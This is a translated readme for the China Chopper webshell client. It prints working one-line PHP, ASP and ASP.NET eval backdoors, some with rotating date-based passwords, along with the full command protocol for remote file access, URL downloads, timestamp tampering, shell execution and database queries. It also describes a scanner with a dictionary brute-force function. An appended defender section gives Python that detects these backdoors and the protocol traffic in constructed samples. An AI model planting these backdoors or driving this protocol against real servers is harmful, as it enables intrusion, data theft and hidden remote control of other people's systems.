China Chopper (中国菜刀)
Official website: http://www.maicaidao.com/
----------------------------------------------------------------------------------------------------------

	Notice before use: the user is fully responsible for all of their own actions!
	The author bears no responsibility for any consequences of using this software.
----------------------------------------------------------------------------------------------------------
If you hit a BUG while using it, first check whether a newer version has been released.
----------------------------------------------------------------------------------------------------------

The program is UNICODE-encoded and supports multi-language display.
Outside a Simplified Chinese environment it switches to the English interface automatically; please report any mistakes in the translation.

I. Script client (EVAL)
1) Basic information
	EVAL mode needs only a single line of server-side code to give this program its everyday functions, and it can get through most firewalls, IDS and the like.
	Server-side scripts supported at present: PHP, ASP and ASP.NET; sites served over https (secure connections) are also supported.
	The server-side code is:
	PHP:    <?php @eval($_POST['chopper']);?>
	ASP:    <%eval request("chopper")%>
	ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
		(Note: the ASP.NET version needs a file of its own, and that file must be a Jscript page)
	Customize:	a custom server side, which can be written in any dynamic scripting language as long as it follows the server-side protocol described at the end of this document.
		In this mode you decide which functions to implement: only directory/file management, only the terminal, or a minimal set.

	Date-based (periodically changing) password, written as:
	Asp.NET:
	<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>
	PHP:
	@eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);
	Example: if the server-side password is chopper, prefix it with the date marker and enter it in the client as {D}chopper.

	
2) Usage
	Right-click the shell list / Add, enter the address in the dialog (note the value of pass in it), choose the correct script type and the password,
	and you can then use the file manager, terminal, database and custom-script functions.
	1. File manager [green]: directory tree, with online viewing of directories;
	2. Terminal: [green] emulated command line (type HELP for usage); data is handled in 5k-byte units and submitted directly.
	3. Database: [green] graphical interface; supports MYSQL, MSSQL, ORACLE, INFOMIX, ACCESS and any database that can be connected over ADO.
		Anything the SQL syntax allows can be done without PHPMYADMIN, and the database functions work with any script type.
		(For the database connection format of each script type, click the button in the upper right corner of the database window)
   	4. Custom scripts: submit a script you wrote yourself and have it executed, for functions beyond the built-in ones; parts of a script can also be run selectively.
		To write your own CCC scripts, refer to the examples in the CCC directory; you can also write richer scripts
		once you have read the CCC script documentation.
	Note: depending on the server's security configuration, some functions may be unavailable.

3)  How to write the configuration information
	---------------------------------------------------------------------------------------
	A)  Database:
	-----------------------------------------------------------------------------
	PHP scripts
	<T>type</T> the type is one of MYSQL, MSSQL, ORACLE, INFOMIX, POSTGRESQL
	<H>host</H> the host is an IP address or localhost
	<U>database user</U> the database user, e.g. root
	<P>database password</P> the database password, e.g. 123455
	<N>default database</N> the database to connect to by default

	<L>utf8</L> character set; optional, normally used when the database is MYSQL and the script is PHP; the default is latin1

	ASP and ASP.NET scripts
	<T>type</T> the type can only be ADO
	<C>ADO connection string</C>
	ADO connects to every database the same way; for example the MSSQL connection string is
	Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
	NT authentication logins to an MSSQL database are also supported, and query result lists can be exported to an html file.

	Customize scripts
	<T>type</T> the type can only be XDB
	<X>connection information in whatever format the Customize script itself defines</X>
	The database connection format used by the bundled Customize.jsp (examples):
	MSSQL:
	<X>
	com.microsoft.sqlserver.jdbc.SQLServerDriver
	jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
	</X>
	MYSQL:
	<X>
	com.mysql.jdbc.Driver
	jdbc:mysql://localhost/test?user=root&password=123456
	</X>
	ORACLE:
	<X>
	oracle.jdbc.driver.OracleDriver
	jdbc:oracle:thin:user/password@127.0.0.1:1521/test
	</X>

	B) Other:
	-----------------------------------------------------------------------------
	Extra data attached to every submission; for example, with this ASP template:
	<%
	Set o = Server.CreateObject("ScriptControl")
	o.language = "vbscript"
	o.addcode(Request("SC"))
	o.run "ff",Server,Response,Request,Application,Session,Error
	%>
	configure the additional data as follows:
	<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
	and then simply use pass as the password.

	A login packet POSTed before the requests; it is submitted only once per session.
	<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
	<DATA>uid=user1&pwd=123456</DATA>

	Default terminal program path, example:
	<SHELL>/bin/sh</SHELL>

	Default terminal command, example:
	<CMD>whoami</CMD>

	Directory the file manager opens by default, example:
	<CD>c:\windows\temp\</CD>

3)  HTTP login authentication
	Shell address: http://user:pass@maicaidao.com/server.asp
	Special characters in the username or password must be URL-encoded.

    4)  Data import: in the SHELL list view, the right-click menu has an item that imports data from other versions into the current program.

II. Security scanner
	Spider crawling, directory name lookup, and so on.
	Examples:
	A) Look up the domains bound to a single IP
	{reverse_ip} {url:http://www.maicaidao.com/}
	B) Scan every open WEB server in the same class C range and look up each one
	{reverse_ip_c} {url:http://www.maicaidao.com/}
	C) Only scan the open WEB servers in the class C range
	{reverse_ip_c} {url:http://www.maicaidao.com/} {port}
	D) Spider
	{spider} {url:http://www.maicaidao.com/}
	E) Spider, restricted to a crawl range
	{spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
	F) Spider, filtering duplicate URLs to speed up crawling
	 {filter}
	G) Crack function; %s is replaced by each line of the dict
		flag: a keyword that must appear in the returned data (including the HTTP headers)
		a leading !! negates it: keyword present means FALSE, keyword absent means TRUE
		list.txt is a file in the current directory, or a full path (note: keep the file size reasonable)
		Note: from the 20100626 build onward, list.txt must be a UNICODE-encoded text file
	{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
	{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
	{crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}

III. Scheduler
	Scheduled tasks with a period of every day / every week / every month / run once.

IV. Browser
	A dedicated browser page: POST / custom Cookies / run custom scripts / auto-refresh pages / pages hosted on the same IP.
	Using the ip.dat database, the status bar shows the site's IP address, among other things.

V. Other
	To be added.



--------------------------------------------
20110628 note:
This document has been rewritten.
--------------------------------------------


File description
------------------------------------------------------------------
chopper.exe	the client program
db.mdb		the client database
------------------------------------------------------------------
cache.tmp	the client cache database (can be deleted)
readme.txt	this document (can be deleted)
<CCC>		client-side custom scripts (can be deleted)
<Customize>	server-side files for Customize mode (can be deleted)
	Customize.aspx	a C# example (full function set)
	Customize.jsp	a jsp example (full function set)
	Customize.cfm	a cfm example (file manager and terminal only)



-------------------------------Customize mode: communication interface between the server side and the client-----------------------------------------------------------------
----------------------------------Other server sides can be written against this interface (see Customize.jsp / Customize.cfm)---------------------
Notes: the client password is written as pass, and the code page selected is GB2312 (the Jsp side uses this parameter)
Note: all data returned after a POST submission must begin with the marker ->| and end with the marker |<-
Note: returned error messages start with ERROR://
Note: \t is the TAB character, \r\n is a CRLF line break, \n is an LF line break
Note: the database connection information is a single string whose format the server-side script defines and parses itself.
-----------------------------------------------------------------------------------------------------------------------------------

[Get the absolute path of the current directory]
Submit: pass=A&z0=GB2312
Returns: the absolute path of the current directory, then \t, then (on Windows) the list of drive letters
Example: c:\inetpub\wwwroot\	C:D:E:K:
Example: /var/www/html/	

[List a directory]
Submit: pass=B&z0=GB2312&z1=directory path
Returns: the entries in the directory; directory names end with /, file names do not
Example:
	dirname/\tmtime\tsize\tattributes\ndirname/\tmtime\tsize\tattributes\n
	filename\tmtime\tsize\tattributes\nfilename\tmtime\tsize\tattributes\n

[Read a text file]
Submit: pass=C&z0=GB2312&z1=file path
Returns: the contents of the text file

[Write a text file]
Submit: pass=D&z0=GB2312&z1=file path&z2=file contents
Returns: 1 on success, an error message on failure

[Delete a file or directory]
Submit: pass=E&z0=GB2312&z1=absolute path of the file or directory
Returns: 1 on success, an error message on failure

[Download a file]
Submit: pass=F&z0=GB2312&z1=absolute path of the file
Returns: the contents of the requested file

[Upload a file]
Submit: pass=G&z0=GB2312&z1=absolute path where the uploaded file is stored&z2=file contents (in hexadecimal)
Returns: the contents of the requested file

[Copy a file or directory (paste)]
Submit: pass=H&z0=GB2312&z1=absolute path of the source&z2=absolute path of the destination
Returns: 1 on success, an error message on failure

[Rename a file or directory]
Submit: pass=I&z0=GB2312&z1=old name (absolute path)&z2=new name (absolute path)
Returns: 1 on success, an error message on failure

[Create a directory]
Submit: pass=J&z0=GB2312&z1=directory name (absolute path)
Returns: 1 on success, an error message on failure

[Change the timestamp of a file or directory]
Submit: pass=K&z0=GB2312&z1=absolute path of the file or directory&z2=time (format yyyy-MM-dd HH:mm:ss)
Returns: 1 on success, an error message on failure

[Download a file from a URL]
Submit: pass=L&z0=GB2312&z1=URL&z2=absolute path to save the download to
Returns: 1 on success, an error message on failure

[Execute a shell command (the shell path gets -c or /c added according to the server's operating system)]
Submit: pass=M&z0=GB2312&z1=shell path (with -c or /c)&z2=shell command
Returns: the command output

[Get the database list]
Submit: pass=N&z0=GB2312&z1=database connection information
Returns: on success, the list of databases (separated by the tab character \t); on failure, an error message

[Get the tables of a database]
Submit: pass=O&z0=GB2312&z1=database connection information\r\ndatabase name
Returns: on success, the list of tables (separated by \t); on failure, an error message

[Get the columns of a table]
Submit: pass=P&z0=GB2312&z1=database connection information\r\ndatabase name\r\ntable name
Returns: on success, the list of columns (separated by the tab character \t); on failure, an error message

[Execute a database statement]
Submit: pass=Q&z0=GB2312&z1=database connection information\r\ndatabase name&z2=SQL statement
Returns: on success, the result data; on failure, an error message
Note: the first line returned is the header row, which the client shows as the column list, and every following line is one data row; each column is followed by \t|\t and each row ends with \r\n.
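Added defender-side example, not part of the original readme or the tool: the first function screens server-side scripts for the three EVAL one-liners listed in section I, and the rest screen logged POST exchanges for the Customize protocol described in this section (single command letter in the body, a `->|`...`|<-` framed reply, `ERROR://` errors). All file contents and request/response pairs are constructed samples.

```python
import re
# Constructed sample data (not from the original page): four web-root files and
# three request/response pairs as a reverse proxy or WAF would log them.
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
    "/var/www/html/img/.x.php": "<?php @eval($_POST['chopper']);?>",
    "/inetpub/wwwroot/up.asp": '<%eval request("chopper")%>',
    "/inetpub/wwwroot/a.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>',
}
SAMPLE_EXCHANGES = [
    ("POST", "pass=A&z0=GB2312", "->|c:\\inetpub\\wwwroot\\\tC:D:E:K:|<-"),
    ("POST", "pass=C&z0=GB2312&z1=c:\\nofile.txt", "->|ERROR://file not found|<-"),
    ("POST", "uid=user1&pwd=123456", "<html>welcome</html>"),
]
# Source signatures for the three one-liners: eval() fed straight from a request parameter.
ONE_LINERS = [
    ("php-eval-post", re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I)),
    ("asp-eval-request", re.compile(r"eval\s*\(?\s*request\s*\(", re.I)),
    ("aspnet-eval-unsafe", re.compile(r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I)),
]
# Customize-protocol traffic: body is <param>=<A..Q>&z0=<charset>[&z1=...][&z2=...],
# a reply is framed ->| ... |<-, and an error reply starts with ERROR:// inside the frame.
CMD_BODY = re.compile(r"^[A-Za-z0-9_]+=[A-Q]&z0=[\w-]+(?:&z1=[^&]*)?(?:&z2=.*)?$", re.S)
FRAME = re.compile(r"->\|(.*?)\|<-", re.S)

def scan_source(text):
    """Names of the one-liner signatures present in one server-side script."""
    return [name for name, pat in ONE_LINERS if pat.search(text)]

def scan_files(files):
    """path -> matched signatures, only for files that match something."""
    return {p: h for p, t in files.items() if (h := scan_source(t))}

def classify_exchange(method, body, response):
    """Reasons one request/response pair looks like Customize-protocol traffic."""
    reasons = []
    if method == "POST" and CMD_BODY.match(body):
        reasons.append("command body")
    framed = FRAME.search(response)
    if framed:
        reasons.append("framed reply")
        if framed.group(1).startswith("ERROR://"):
            reasons.append("error reply")
    return reasons

def flag_exchanges(exchanges):
    """Indices of exchanges showing both a command body and a framed reply."""
    return [i for i, e in enumerate(exchanges)
            if {"command body", "framed reply"} <= set(classify_exchange(*e))]
```

Requiring both the command-shaped body and the framed reply before flagging keeps ordinary login forms (such as the uid/pwd packet above) out of the alerts.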

